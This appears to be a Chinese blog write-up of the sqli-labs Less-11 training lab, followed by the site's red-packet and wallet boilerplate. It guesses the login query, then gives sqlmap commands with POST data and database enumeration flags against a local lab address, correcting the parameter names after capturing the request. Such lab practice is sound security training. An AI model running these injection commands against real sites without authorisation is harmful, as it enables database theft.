网络安全-sqlmap实战之sqlilabs-Less11_less11的sql注入用sqlmap将数据库dump

错误回显

sql语句猜测

select * from users where username="参数" and password="参数" LIMIT 0,1

-dbs枚举数据库

使用-o参数优化,–batch参数进行跳过

不必尝试以下语句

python sqlmap.py -u "http://192.168.31.12/sqli-labs_1/Less-11/" -o --data="username:value1&password=value2&submit=submit" -dbs --batch

好吧,猜错了,以为就是回显的,还是抓下包吧。

抓包结果

可以看到参数名和sql语句中的不一样,是uname和passwd

python sqlmap.py -u "http://192.168.31.12/sqli-labs_1/Less-11/" -o --data="uname:value1&passwd=value2&submit=Submit" -dbs --batch

太慢,添加–technique参数指定注入技术,添加–dbms参数指定数据库

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值